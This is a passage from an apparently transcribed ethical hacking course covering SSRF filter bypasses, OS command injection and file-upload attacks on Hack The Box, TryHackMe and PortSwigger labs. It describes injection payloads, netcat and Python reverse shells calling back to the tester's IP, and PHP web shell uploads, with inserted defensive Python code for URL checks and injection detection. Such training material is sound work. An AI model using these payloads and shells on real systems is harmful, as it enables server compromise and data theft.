play with it. So we'll just put in our own IP address right here, we'll turn intercept on and we'll submit this, we can send this to Repeater, we can turn that off, and it's going to give an error because there's nothing for it to connect to, but that is okay. So over here in Repeater we have this right here, and if you remember, to URL-decode it is Ctrl+Shift+U if you are on a Mac; not sure what it is if you are on a Windows box. So there's a couple of different ways to get this SSRF to work, and I actually want to try something real quick that I have not tried on this box before. I want to see if we can bypass the filter by going file:// /etc/passwd, and I believe this actually needs three slashes right here to work. And so what you see we did here is we saw that it didn't work with just /etc/passwd, but it might just have a filter on the box, and if we change some of the casing it may work for us, and it tells us we have an invalid protocol. So it has to be HTTP, an HTTP request, so we're not able to just pull down a file, because it's requiring HTTP in order to be in the request, so we're not going to try and grab the /etc/passwd file. So what we're going to do now is just try and make a request back to the server and get it to work. So in the bug bounty world, if you come across something like this and you're just trying to prove that you can reach back to the server with a request, what we're going to do is just try and query the server and see if we can get this to tell us something other than an invalid protocol. So if we come in here and we go to the actual URL, which we have right here, which would be forge.htb, and we send this, we get told it is blacklisted, so you're not able to go to the actual URL right here. But if you do like we tried with the /etc/passwd file, you can just come in here and type in forge and you can just change a few of these characters, and now if you send it, it tells us we have reached back to
the server and we are not getting a blacklisted message any longer. So this is one way to try and bypass a blacklist or something on a server. And if you come in here and you do a 127.0.0.1 and you send this like we were doing earlier, it is blacklisted. But the actual IP address... so if you wanted to get the IP address of this right here, it tells us that this right here is blacklisted, but if we actually wanted to get the IP address, let's say we're on Yahoo or something and we want to know the actual IP address of what we have going on right here, Burp will actually tell us what the IP address is really easily. You can just come over to your proxy and turn your proxy on, and we can come to our URL upload, you can just type something in here, doesn't matter what it is, submit it, and when you hit this it'll tell us the request is being sent to forge.htb but the IP address is 10.10.11.11, and we don't really need that request. So what you can do, since this is blacklisted and this is blacklisted, you can just try the actual IP address of the server, and in this case it looks like this, and you can send it and you can see that it went through. So the IP address, ironically, is not blacklisted. I'm not sure if Hack The Box meant for that to work or not, but it worked. So you can actually try several different ways to get past the blacklist within a server-side request forgery, and this is a few different ways to do that. Okay, so I think we're going to go ahead and pause on SSRF at this point. If you have any questions on server-side request forgery and you'd like to see something in more detail please let me know down in the comments, but in the world of bug bounty this would be plenty to get you by. However, if you're going to be a penetration tester you're probably going to have to dive into SSRF in a little deeper context, that way you learn how to take a server-side request forgery and turn it into remote code execution, but I think that is out of scope of this video, so we're
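The bypasses just shown (changing the case of the hostname, a different spelling of the loopback address, the raw IP instead of the blacklisted hostname) are exactly what a string-matching blacklist misses. As an added example, not code from the video, from Hack The Box or from PortSwigger, here is the shape of the outbound-URL check a defender would put in front of an upload-from-URL or stock-check feature: it allows only http and https, resolves whatever the hostname is to addresses, and refuses anything that lands on a loopback, private, link-local or otherwise non-public address. The function names, the injectable `resolver` hook and the sample hosts in the usage are assumptions for the demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _system_resolver(host):
    """Default resolver: every address the OS resolver returns for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _addresses_for(host, resolver):
    """Normalise host to a list of ipaddress objects.

    IPv4 literals go through inet_aton first so shorthand spellings such as
    127.1, 0x7f.1 or 2130706433 become the dotted quad a socket would use;
    a plain string blacklist on "127.0.0.1" never sees those forms.
    """
    try:
        return [ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))]
    except OSError:
        pass
    try:
        return [ipaddress.ip_address(host)]  # IPv6 literal such as ::1
    except ValueError:
        pass
    return [ipaddress.ip_address(a) for a in resolver(host)]


def _is_internal(addr):
    """True for any address a server-side fetch should never reach."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def check_outbound_url(url, resolver=_system_resolver):
    """Deny-by-default check for a URL the server is about to fetch.

    Returns (allowed, reason). `resolver` is injectable so the check can be
    exercised without DNS (an assumption of this demo, not a library API).
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:          # rejects file://, gopher://, ...
        return False, f"scheme {scheme or '<none>'} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = (parts.hostname or "").lower()      # hostnames are case-insensitive
    if not host:
        return False, "no host"
    try:
        addrs = _addresses_for(host, resolver)
    except (OSError, ValueError):              # gaierror is a subclass of OSError
        return False, f"cannot resolve {host}"
    for addr in addrs:
        if _is_internal(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs for the demo; the fake resolver avoids real DNS.
    fake_dns = lambda h: {"localhost": ["127.0.0.1"], "example.com": ["93.184.216.34"]}[h]
    for candidate in ("file:///etc/passwd", "http://127.1/admin", "http://LOCALHOST/admin",
                      "http://10.10.11.11/", "http://example.com/image.png"):
        print(candidate, "->", check_outbound_url(candidate, resolver=fake_dns))
```

Two caveats a practitioner would add: the address that passed the check must be the one the fetch actually connects to (resolve once, then connect to that IP and send the Host header yourself), otherwise a DNS answer that changes between the check and the connection gets around it; and any redirect the remote server returns has to be run through the same check before it is followed.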
gonna go ahead and pause this here, and if you would like to see more server-side request forgery in the future and how to turn this into remote code execution please let me know and I'll get to that.

All right, before we close out this section here on server-side request forgery, I thought I would pull up the hacktivity, and I was reading through some of these recently, and you can just see, look at how high the impact is for server-side request forgery. And I was reading through how some of these were done, and this one right here was really cool, and I thought I would show you how this actually works. And so I went and read through this and I actually did learn a little bit about the exploit, and it was pretty cool, and I came back to the PortSwigger labs and was playing around and I found out something I did not know before. So if you come in here where this server-side request forgery is, and you remember it's right here inside this stockApi, we can send this over to Repeater, and if we URL-decode it we have this right here and we can see what's being sent, but we'll go ahead and put that back. But what you can do, that I didn't realize we were able to do, is you can just add in another parameter. If we were breaking this right here and it wasn't working, we can just come in here, put the ampersand, and type in stockApi= and then we could just do the localhost and then we can go /admin, because we're supposed to pull down the /admin panel, and we can send that. And we need http:// and it works for us, and it pulls down the information we needed in order to delete the user carlos. So I didn't know beforehand that we can just add in new parameters right here, and so I thought this was something that was really cool, that you can add in extra parameters in here in addition to the one that's already there. So you don't actually have to delete this first one, you can just pull down a second one. And then also, reading through
the hacktivity, I noticed... I think what we'll do is just delete this first one so it looks nicer, so you can see it, and so we'll send this and we don't get quite as big of a page back. When you're doing something like searching for an SSRF, I noticed a few of the hacktivity reports, where they had hit a line like this that's accepting a parameter, or even up here in the URL, what they just started doing was they would say &url= and then they'd put in 127.1, and then you could just leave it like that, and they were sending this. And it would be easier to test for this if you had it in Repeater, so we can grab this, send it to Repeater, not Sequencer, send this over, turn that off, and then if you send this you'll see it doesn't actually pull anything back for us, and you can search for the word delete over here, as if we're going to delete the user, and there is nothing. But you can try this url, you can try urls, and send that to see if this is a parameter that will actually reach out to the server; usually it's going to be saved as a urls or a url, something like this. And this is not vulnerable, this actual lab is not vulnerable with the url parameter, because the url parameter is not the one that's making the request out to the server. But you could very easily change this with change request method, and then delete this and just add in the stockApi just like this, and this should work. I think we have to make it so it says it needs to go to the admin panel... it needed this up here, /product, and then the /stock directory, and then, I forgot, http://. So basically this is just remaking this request over here, but this should work now, and it does. So you can play around with these when you're in a live program and see if you can find a parameter that actually does hit the URL. So if you come over here and you open up this and you're reading through it, what's really interesting inside of this guy's
explanation is there was actually a notification that says this right here is reaching out to the URL parameter, which just pretty much tells you that it's going to be vulnerable to a server-side request forgery, and when he tested it right here, it works. Now this guy had to do a little more to it, and I don't want to read all this to you, so you can come out here and read it, but he had to do a little bit more in order to get this to work, through a token I believe it was, but it was a pretty cool server-side request forgery. And you can come over to the hacktivity, now that you understand how server-side request forgery works, and you can read through some of these and see if you can learn additional ways to pull off a server-side request forgery. So with that, I'll see you in the next vulnerability.

All right, welcome to the section on command injection. This is probably going to be one of the most severe vulnerabilities that you will ever come across. This vulnerability gives you the opportunity to execute commands on the server and get information back, and possibly even get a shell on the server, so this is one of the most severe vulnerabilities that you will probably come across, because you can just compromise the server and all of the information on it, and if you're in a penetration test then you can try and move around within the network. So let's go ahead and dive into command injection. Okay, we are going to be talking a little bit about command injection, and there's not really a whole lot of places to practice command injection that I know of; really it's just TryHackMe and then PortSwigger, which we'll come to here in a little bit and practice on. So with command injection, what we are able to do is put commands into the server and then it'll give us the information back for whatever we sent the command in for. So if we send a whoami command it will tell us who we're running as on the server. And so it says here a command injection vulnerability is also
known as remote code execution, because an attacker can trick the application into executing a series of payloads that they provide without direct access to the machine. So this might sound a little confusing, but it's going to make a lot of sense here in just a second, and so their example here is the whoami command, and I'm going to go ahead and launch this box, and then once it is loaded I will bring you back. Okay, so this is now loaded up and ready for us to practice some command injection, but before we do I want to show you kind of what is happening. If we come over to a terminal here, the first thing I want to do is copy this to make sure we know what kind of commands to send through to the server, but really you could just put in a whoami and you could probably figure it out by that. But we can also type in ping and then the IP address that we just copied, and then you can hit enter, and we see that the TTL is 61, so we know that this is going to be a Linux server that we are up against. So now it tells us to use this handy web application to test the availability of a device by entering its IP address, and it's just going to go out and reach to an IP address. So a way to test this is, if we wanted to check our device, we could come over here and set this up, and my IP address is up here, so we could say 10.2.42.96 and execute and see if we can get it to reach out, and it sends a ping out to our box, and it did not connect, but it pinged our box. So this is just sending a ping, it's not actually trying to connect. So what we can do with this now is you can just type in 127.0.0.1 and you can execute it, and it's going to give us back another ping of the box, and I guess I didn't need to ping it because it tells us right here it's going to be a Linux box. So some of the things we can do... I actually played around with this, that's why you can see these in here; I wanted to see all the different commands that it actually let me send so I
wasn't just sitting here testing everything for the first time. So here's a couple of the command injections that you're going to need to know. If you come in here and we type in 127.0.0.1, you can do an ampersand like this, we can put in an ampersand just like this and then we can do a whoami, and it'll execute, and you can see that it says we are www-data, but we still get this ping right here. And it is possible in the coming lessons that we just don't want to see all this ping right here, so what you can actually do is just put in a bunch of mumbo jumbo and then you can use a double pipe and then do the whoami, and it skips the ping and we get the www-data. But if we run this command right here and we don't double pipe it, you only do one pipe... oh, it still works, okay. I was going to say that it doesn't work, but it worked for us, so we still get the www-data. So sometimes it won't work with one pipe and you'll want to send through two pipes, and then sometimes you'll also have to have a pipe afterwards, and run it, and that time it doesn't work for us. So you will, in the wild, just have to play around with this. So we get the whoami and it tells us we're www-data, and you can type in id and see how we're sending commands through. So if we come back over here and I type in id you can see we get this back, so we're actually communicating with the server, and this would be a very, very bad thing in the real world. So there's one more thing I wanted to show you, and that is this ping right here. If you were doing a blind command injection and you wanted to know if you could reach the server but you weren't getting any information back, you could run the regular... whatever's up here; sometimes it's not going to be something like this, you're not going to be pinging a server, it'll usually be a parameter with an equals sign and then you put a command in over here. But you can ping, and the -c with the 10 is going to tell
it to delay 10 seconds, so we'll actually put in five seconds so we don't have to wait quite so long, and it's going to ping itself. So if you watch down here we have the seconds, and we'll hit it when it hits 10 seconds and wait for it and see if it comes back in five seconds; if so then that works, and it did. So we pinged it, and that's how you do a time delay, which we're going to see in just a little bit. You can also run these with this ampersand right here; there will be times that you'll need to try this. And you can actually, if you're getting stuck on command injection, what you can do is go out to Google and just type in command injection bypass, and just look for different Windows command injection bypasses; maybe you'll have to do some URL encoding or something of that nature, and you can just bypass whatever filters they have. So you can also do, with this, you can do two ampersands just like this, and it should still work for us, and we'll send that over and see if it takes five seconds, and it comes back. And then I want to try one more thing. I actually have not tried this yet, but because this didn't reach back on our netcat, I want to try this again. We'll set up a netcat listener and we're going to set it up on port 4000.
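Everything shown so far with `&`, `|`, `||`, `&&` and `ping -c 5 127.0.0.1` comes down to one thing on the server side: the IP parameter is concatenated into a shell command string. As an added example, not code from the video or from TryHackMe, here is a minimal Python ping endpoint in its vulnerable form next to a hardened one, plus a helper that tokenises a command string the way a POSIX shell would, so you can see which separate commands an injected value would have produced. The function names and the 5 second timeout are assumptions for the demo; `shell_segments` only handles the listed separators, not backticks or `$( )`.

```python
import ipaddress
import shlex
import subprocess


def vulnerable_ping_command(target):
    """The unsafe pattern: the request parameter is pasted into a shell string.
    Returned rather than executed so its effect can be inspected safely."""
    return f"ping -c 1 {target}"


def shell_segments(command):
    """Split a command string on |, ||, ;, &, && the way a POSIX shell would
    (shlex with punctuation_chars) and return each command that would run."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    segments, current = [], []
    for token in lexer:
        if token in ("|", "||", ";", "&", "&&"):
            if current:
                segments.append(" ".join(current))
            current = []
        else:
            current.append(token)
    if current:
        segments.append(" ".join(current))
    return segments


def hardened_ping_argv(target):
    """Allow-list validation: the value must parse as an IP literal, which
    rules out every shell metacharacter, and the command is built as an argv
    list so no shell ever interprets it."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"rejected ping target {target!r}: not an IP address")
    return ["ping", "-c", "1", str(addr)]


def is_safe_target(target):
    """Boolean view of hardened_ping_argv for callers that just want yes/no."""
    try:
        hardened_ping_argv(target)
        return True
    except ValueError:
        return False


def run_hardened_ping(target, timeout=5):
    """Execute the validated argv without shell=True; the timeout bounds the
    request even when the host never answers (5 s assumed for the demo)."""
    return subprocess.run(hardened_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout, check=False)


if __name__ == "__main__":
    injected = "127.0.0.1 || whoami"   # constructed input for the demo
    print(shell_segments(vulnerable_ping_command(injected)))  # two commands
    print(is_safe_target(injected), is_safe_target("127.0.0.1"))
```

The point of `shell_segments` is to make the video's trial-and-error visible from the other side: a single `|` already yields a second command, so whether one or two pipes "works" depends only on how the application wraps the value, while the hardened version never reaches a shell at all.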
And see if we can actually get this to connect back to us. So if we do this right here, we can do our pipe, we'll actually do a double pipe, and then hopefully we have netcat available, and we can type in our IP address for it to connect back to, so 10.2.42.96, and then -e and then we'll go /bin/bash, and then we can execute this and see if it reaches back. It doesn't look like it's going to, because I did not type in the port, so we'll highlight this, we need to put a port in here, and I think I did 4000. Execute; it was port 4000 and it did not reach out. So maybe this doesn't work. We'll try one more time and then we'll move on, and I want to show you one other thing you can try with this. So netcat doesn't work, it didn't reach out to us, so one thing you can also do in this command injection, like if you were going to capture the flag, one thing I would do is I would come in here and I would type which python and see if we could get a Python reverse shell. And we can close out of that, and let's do something like this so we can get just what we want back, and we don't have any output. Let's see, so this box might not let us get a reverse shell on it, so I guess we're not gonna be able to figure out what kind of Python is on here, but this would be command injection in a nutshell. And I'm guessing we just... oh, we have python3, so we could try to get a reverse shell with Python. So you could come to Google and we would type in Python reverse shell, we can try PentestMonkey, and we could try this right here. So we can set up our netcat listener, we'll go port 444, and we can type something in here. We got /bin/sh, I want /bin/bash; what do we have over here, and it's possible that this won't work either, and I would suggest typing something out like this in a text editor to save some time. 10.2.42.96, and make sure this says python3. Execute, and we get a shell back over here. So now if we say whoami we are on the box, and if we type in id it'll tell us who we are. So you can get a reverse shell this
way rather than just be sitting over here with command injection. And sorry, I kind of fumbled around there; I actually didn't try that before we did this little video here. So this is command injection in a nutshell. This is a great place to practice, so if you have a subscription to TryHackMe this is a really good place to come over here and practice your command injection, but if you don't there's also a free way to practice command injection, and we're going to practice it here in just a second on PortSwigger. So let's go ahead, and I'm gonna get things set up and we will start command injection over here in PortSwigger. If you would like to go ahead and open up PortSwigger and get this set up so you can follow along, or try them on your own, then you can do that.

Okay, so here we are at PortSwigger and we are on the OS command injection. We're going to do these first three right here because they're pretty easy, and I believe you have to have Burp Pro for this, and so we're not going to do these ones down here, but the first three of these are actually pretty easy and you should be able to, I think, solve them. I think you probably could solve all three on your own, but for sure you should be able to solve these first two. So we'll go ahead and open this up, and it tells us this lab contains an OS command injection vulnerability in the product stock checker; the application executes a shell command containing the user-supplied product and store IDs. So we've seen stuff like this in the past. So we'll access this lab and it tells us we are not solved, because we haven't done anything, so when we have finished this, this should say solved up here. So we can see what Burp is doing: it's doing nothing, it's not hooked up. So down here in the check stock, like we've been doing and following the instructions right here in the product stock checker, we can forward that, we're going to check stock, forward, and right here is what we need; send that to Repeater, we can turn that off, and now we have the product ID and
the store ID, and this is going to be where the command injection is at. So if you would like to try and solve this command injection by yourself, I would go ahead and give you this challenge: we have found the location, and I think you can figure it out, it's right here; you should try and see if you can figure out some of the command injection commands that you just saw previously, and give it a shot. But if not, here we go. So we have this productId right here of 1, and what we were doing in some of the last ones was we were able to put this ampersand in here, but because of the location of the command injection in this POST request we're not going to be able to use those; we will have to use a pipe. And so you can type in a pipe right here and do something like a whoami, and we can send this and see what happens, and it tells us who we are, so that probably right there solved this for us, and it did. But while we're here let's play around with this. Let's see what happens if we do two pipes and we send this; it does nothing. What happens if we do two pipes at the end and send it? Nothing comes back. What happens if we just do one and one? And this is just something that I would encourage you to do as you come across things like this. So we actually have it come back with a pipe at the end and in the beginning. What happens if we change this to very clearly a product ID we don't have? And it still works. What happens if the product ID is wrong and we have two pipes and we send it? Nothing. Now what about this storeId right here? What if we tried two pipes and we go whoami? It gives us a syntax error. What about two pipes and we send it? It gives us the same thing. We can come over here and maybe we can say an id; it tells us who we are. And so you can really just play around with this and see what happens. What if we put a crazy ID number in here? It still works. And then you can just mess around with this and see what works and what doesn't. If we check out whoami, syntax error; we
could go which python like we did before and this is black because it needs to be URL encoded which is a plus sign and we don't get anything back and I don't think that you're able to get remote code execution on this so here we go this would be your command injection right here we're going to try and do another one on this on this lab right here so if you would like to go ahead and open this up and read the instructions then I would say go ahead and see if you can figure this out I'm not going to read it just yet I want you to go ahead and read this and try and figure it out on your own and if you get stuck then we'll go over it okay so this says the lab contains a blind OS injection so if you're familiar with the bug Bounty for beginners of course that I already have out then we know that a blind injection means we're going to have to do some kind of time delay and it's not going to tell us what's in the response so we have a 10 second delay in order to solve this Challenge and it tells us that the vulnerability is in the feedback function so with this you can go ahead and open up the lab and we have this submit feedback right here and we can just type in a bunch of gibberish and I think this is going to ask for some kind of ending for an email account and we can come back and intercept this send it we'll send this to repeater and it is possible that this took you much much longer to figure out because we have a bunch of different parameters in here that we are testing again so we have the name right here so in a time delay we saw this in the try hack me example that I I showed you you're going to try and do a ping against the server itself and wait for the time delay so what we would do in a time delay command injection or a blind command injection with a time delay you will type in ping and then we have to URL encode it and it will look just like we did previously I'm going to do five seconds to start out so we don't have to wait 27.0.0.1 and then if we send 
this we'll see right here this should be like four or five thousand when it actually works so we can try a pipe at the beginning pipe at the end we can try another pipe and I see that I made a mistake I didn't have the one in there so we'll try this again and say go still not long enough we can add in another one and see if this works and it doesn't seem like this is going to be our spot otherwise one of these would work we can't use the and sign in there so we'll just move on to the next one we'll say pipe ping and I have this I fast forwarded typing this in so you don't have to watch it again so we got our pipe and our ping command we can send this we'll turn this proxy off it's bothering me that it's flashing we can see that the time did not work so we can throw a pipe on the end send it not long enough let's try two pipes and we can send it and our time is much longer and we can see that it was almost five seconds so now to solve this I believe we can type in a 10 right here and send it and this should give us the solve because the five seconds was pretty close so it's not solved and it just came back and it tells us that it has solved so this is a timed command injection or a blind command injection this is how you test it with a ping against the server itself and give it a time delay so with that we're going to move into the last one of our Command injection labs this one is going to be a lot harder I think you can figure it out if you've done the my bug Bounty course and you've also gone through my free ethical hacking course because the ethical hacking course is going to cover things that are kind of like this when you get into the actual penetration testing portion of that course so if you've gone through both of those I think you can solve this if not and you're pretty new you're probably gonna struggle with this one but we'll go ahead and solve it anyway so we'll open up the lab in a new window and then we'll read what it says so it has a vulnerability 
that is blind in the feedback function just like we had before the output is not returned in the response like before however you can use the output redirect to capture the output from the command and it says that we have a writable folder and then it tells us to solve the lab we need to execute a who am I command and retrieve the output so what we're going to end up having to do is send a who am I command to the server and then we're going to have to save it in a file inside of this images directory so it's going to be VAR www images and then the file with an output so if you went through the ethical hacking course I think you can solve this if not we'll go ahead and solve it together now so I just had an idea if you want to try this on your own I can actually show you over here we can make a directory and we'll call it test we'll CD into test CD to test and then what we can do is if I type in who am I I can send this command and I can put it in a file.txt and now if I hit enter and then we Capital LS you can see this files here and I cut out file.txt it tells us that we are Cali or if i g at G edit this file it'll save the response in there so we're basically going to be doing this right here inside of this directory right here so what we're going to do is give a who am I like like we did up here only it's going to be in this right here and so your command is going to look like this and if it has to be URL encoded you'll need plus signs right here um if not you can just you might be able just to delete this and do it with no space and then you're going to need to try and retrieve the file with the command injection and I want to see if you can figure this out so go ahead and give it a try now that I have given you a hint with this clue right here okay so let's go ahead and solve this challenge it said it was in the feedback so we'll come back to the proxy we can come to submit feedback we'll do the same thing we did before and just type in some mumbo jumbo 
gmail.com [Music] and turn our proxy on submit feedback send this to repeater turn the pro turn the proxy off and so here we are at the same page we were at I'm actually going to make sure that this is in the exact same the command injection is in the exact same place so we don't spend a bunch of time trying to send this somewhere that it's not so we'll go ping so I wrote The Ping command out so you didn't have to watch it I sent it and we'll see it was a five second delay so the command is the command injection is in the same place so we should be able to come in here and say who am I and then we'll give our carrot and then we'll give it the location that we were supposed to give it right here paste that in and then we'll say file Dot txt and send this and hope that it worked and now I think the way to check this is going to be we'll need I think it'll be file and then we'll want to read this file Dot txt so we'll send this okay since this right here isn't working we're going to just go ahead and assume that this is not going to be in the right directory so what we can do with this right here is we know we had to ascend it into the VAR www and I think it was images and then it was our output.text which is where we and then it was our file.text which is where we put our Command who am I right that's what it says we do yes it's in the images so what we're going to probably have to do at this point is find the images because we're not able to pull anything from here so what we'll do is go to the home page and see if we can pull an image somewhere around here see we have the products we have the product ID we have the image okay so we right click the image and hit open image a new tab and we have the image and now we have a file name I bet we can do this without burp and then if we can't we'll open it up and burp so we'll type in file.txt which is where we put the file and it tells us who we are as the user so that's one way to solve this challenge it was a lot more 
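As an added example (not code from the course or from PortSwigger), here is the same product-stock-checker pattern looked at from the defender's side, in Python: the vulnerable build that splices both IDs into one shell string, the hardened build that allow-lists the IDs and returns an argv list so no shell ever sees the input, and a small detector that flags the `|whoami`, `||ping -c 10 127.0.0.1||` and `> /var/www/images/file.txt` shapes from all three labs in request bodies, treating the blind lab as a latency anomaly. The helper name `stockreport`, the request paths and the timing numbers are constructed for this example, and nothing is executed.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Hypothetical name for the backend helper the lab's stock checker runs.
# Nothing here is executed; we only build the command and inspect input.
STOCK_CMD = "stockreport"

# Allow-list: a product or store ID is a short run of digits and nothing else.
ID_RE = re.compile(r"^[0-9]{1,9}$")
# Shell metacharacters that hand control of the command line to the user;
# `|`, `||`, `>` and `$(...)` cover every payload used in the three labs.
META_RE = re.compile(r"[|&;`$<>\n\r]")


def _ids(body: str):
    q = parse_qs(body, keep_blank_values=True)      # decodes %xx and '+'
    return q.get("productId", [""])[0], q.get("storeId", [""])[0]


def build_vulnerable(body: str) -> str:
    """The anti-pattern behind the labs: both IDs spliced into one string
    that is then handed to `sh -c`.  With productId=1|whoami the shell runs
    two commands, which is exactly what the lab response showed."""
    pid, sid = _ids(body)
    return f"{STOCK_CMD} {pid} {sid}"


def build_hardened(body: str) -> Optional[List[str]]:
    """Validate each value against the allow-list, then return an argv list
    for subprocess.run(argv) with shell=False.  Nothing is escaped: input
    that is not a plain ID is refused outright."""
    pid, sid = _ids(body)
    if not (ID_RE.match(pid) and ID_RE.match(sid)):
        return None
    return [STOCK_CMD, pid, sid]


def suspicious_params(body: str) -> Dict[str, str]:
    """Detection: every decoded parameter whose value carries a shell
    metacharacter, keyed by parameter name, for logging or alerting."""
    q = parse_qs(body, keep_blank_values=True)
    return {k: vals[0] for k, vals in q.items() if META_RE.search(vals[0])}


def blind_injection_alerts(records, baseline_ms=500, factor=8):
    """The blind lab leaves no output, only latency.  Alert when a request
    is `factor` times slower than the endpoint baseline AND its body carries
    metacharacters; either signal alone is too noisy on its own."""
    alerts = []
    for rec in records:
        slow = rec["ms"] >= baseline_ms * factor
        bad = suspicious_params(rec["body"])
        if slow and bad:
            alerts.append((rec["path"], rec["ms"], bad))
    return alerts


# Constructed request records shaped like the lab traffic (not real captures).
SAMPLE_RECORDS = [
    {"path": "/product/stock", "ms": 120,
     "body": "productId=1&storeId=1"},
    {"path": "/product/stock", "ms": 130,
     "body": "productId=1|whoami&storeId=1"},
    {"path": "/feedback/submit", "ms": 10120,
     "body": "csrf=tok&name=x||ping+-c+10+127.0.0.1||&email=a%40b.com&subject=s&message=m"},
    {"path": "/feedback/submit", "ms": 140,
     "body": "csrf=tok&name=x||whoami+>+/var/www/images/file.txt||&email=a%40b.com&subject=s&message=m"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["path"], build_hardened(rec["body"]), suspicious_params(rec["body"]))
    print(blind_injection_alerts(SAMPLE_RECORDS))
```

Two things worth taking from it: escaping is not the fix, refusing anything that is not a plain ID is; and for the blind lab the only thing a defender can observe is response time, which is why the alert needs both the latency jump and a metacharacter in the body before it fires.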
This one was a lot more difficult of a command injection. In the real world you wouldn't do anything like this; the only time you're going to do something like this is in a CTF or if you were on a live pentest. In the real world, in a bug bounty, what you would do is probably just send a ping with a time delay and then submit that, and you would stop right there. But because this is a CTF it wanted us to grab this user right here, and this is where we did it: we saved it in images, and we needed the file name and the file.txt. So that is the last of the command injection that we're going to be covering, and we'll move on to the next vulnerability.

All right, in this portion of the course we're going to be covering file upload. This can be a severe vulnerability, especially if the file is placed somewhere that you can execute what you have uploaded and get back a shell on the server. So file upload is one that you're going to see a lot in CTFs. They do happen in bug bounty programs; you can go and read on the Hacktivity about some file uploads. But in the world of bug bounty hunting, most of the time they're probably not going to lead back to a shell. But in the world of penetration testing and CTFs, or if you're going for any kind of certification to become a penetration tester, then file uploads are always a good place to look, and make sure when you're uploading a file to see if you can bypass any of the filters that may be keeping you from uploading a specific file with a payload inside of it. So with that, let's go ahead and jump into the file upload.

So we're going to be going through a few Hack The Box file uploads, and the reason we're going to be doing Hack The Box is there really is no great place to practice file upload, and Hack The Box really has the best systems to practice file upload. If you have a Hack The Box subscription then you can open these up, you can play around with them yourself and actually test these out. If not, in the world of bug bounty, if you go to the Hacktivity, you can read about file uploads happening all over the place. So file uploads do happen. We're going to start really basic and then we're going to have to go through bypassing different filters within the file upload. So this one is really one of the easiest, and if you want to, this box is called October with Hack The Box and its IP address is right here. I'm not going to show you how I got to this spot because really we just want to see the file upload in action, and what happens, and why this would be a really huge vulnerability in the penetration testing world. So the first thing we're going to do is we can click this file upload, and I tested it, you can upload a file right here. And so what we're going to do is we can just click the file upload button, and I'm going to show you two different ways to go about uploading files and testing this out. So the first is with a web shell. What we can do is we can come over here like we did before, and we can go to Google and just look for web shells. I can just show you right here: I just typed in webshell and I scrolled down until I came to the shushan 747 one, clicked on it, and we're brought to some PHP webshells. This one right here is one of my favorites, it's the one I use the most. And we can just say that we want to create a gedit file and we'll call it web.cmd, and sometimes you might have to name this like .php if that's what this server is running in order to get a web shell to run, but we're going to run with cmd and we'll test this out; we may have to change that to PHP, I'm not really sure. And so we can come back over here, we can upload our web shell just like this, and if we go to the URL, this is a good sign that it didn't give us an error. Now we have to pass in a parameter, because we have this right here: it's going to call our web shell when we pass in the parameter cmd. So we can come over here, go ?cmd= and now we should be able to type in a command here, and if our web shell works, we will receive an output on the page. So we can type in whoami and run it, and this doesn't seem to work. So we will rename this, we'll just go mv, so we will type in our web shell and we will just move it from web.cmd to web.php5, and the reason I went with php5 is because right here, I should have saw this the first time, it says php5. So we can save this, and now we can upload, and we'll re-upload our web shell just like this, and now we can click on it, click here, move that out of the way, and we can put our parameter in here. So we want a cmd whoami, and now it tells us we are www-data. And you can use this right here to try and get a reverse shell back over here, but I think what we will do is we would just use the pentestmonkey PHP reverse shell. So we'll just say PHP reverse shell and it should be the first one, and so what you can do is go to Raw, Command-A, Command-C, we will come over here and we will just say gedit and then we'll call it shell.php5, we can paste this in, and then we'll need to change our port, because we're listening on port 444, and over here we are listening on 10... my IP address is 10.10.14.6. We can save this, come back over here, we could probably close that out, we'll upload this file, we want our shell open, and then we click this right here. It hangs, which means we probably have got our callback over here, and we now have a shell on our box.

So I want to explain what is happening now that you've seen this. The way a file upload works: if you upload a file, you have to make sure that you know where the actual file is being stored, because when we upload our malicious code, if you can't execute it on the server it does you no good. So let's say you can upload some kind of shell like this web shell right here or right here, but you can't find the location on the server of this web shell to execute it: it does you no good. So you have to be able to locate it. And for us this is a really, really simple file upload; you just click here and it takes you to the location right here of where our file is that we uploaded. So this is a really simple file upload, and we have this right here that tells us it's running PHP. Sometimes it'll just say, like, we'll have a back end, it'll say something like backend.php like this, and then you'll know it's running PHP; or if it's Windows you may try aspx or asp. And so you're just going to have to get familiar with the systems you're going up against and what you see on the particular server that you're attacking. But this is a really basic introduction into a file upload. We're going to do a couple more that are going to be a little more challenging, which is also going to be a lot more realistic. In the real world the chances you just come across something that just says file upload in a bug bounty is almost zero. Maybe on a penetration test it might happen, but in the world of bug bounty, probably not going to happen; you're going to have to bypass some sort of filters, and we're going to do some pretty simple filter bypassing in the next file upload.

All right, we are here on the box Popcorn. Same thing, I'm not going to show you how to get here because we're just covering file upload, and in this one we're going to talk a little more about bypassing different filters. So if we come in here we have this edit right here, and it tells us we can update the screenshot, which is going to be this image right here, and it tells us it allows a JPEG or a PNG. And I've never tried JPEG, so we might try that just on the fly and see what happens. But we can save this right here, we can go Save Image As, and we're in our test directory right here, so we'll save that. And if we come over here to update the screenshot, we will need to browse, click on our little PNG right here, update it and submit, and it tells us that it worked, the type was a PNG. And now we should be able to come over to the uploads. We can type in 10.10.10.6 and we'll go /torrent and then we want the upload, just like this, and it tells us here is the image that we just uploaded. So that works. So what we will want to do now, let's see if we can upload some kind of shell. So we'll just use one of our PHP shells that we already have in this directory, and we'll browse and we can just try this shell.php5, and if we open this and we submit it, it tells us we have an invalid file. Let's come over here and we will mv our shell.php5 and we'll just call it shell.php, and we can try this, and it says invalid file. Now what we can try and do is intercept the request and see what the difference is between these. So if we 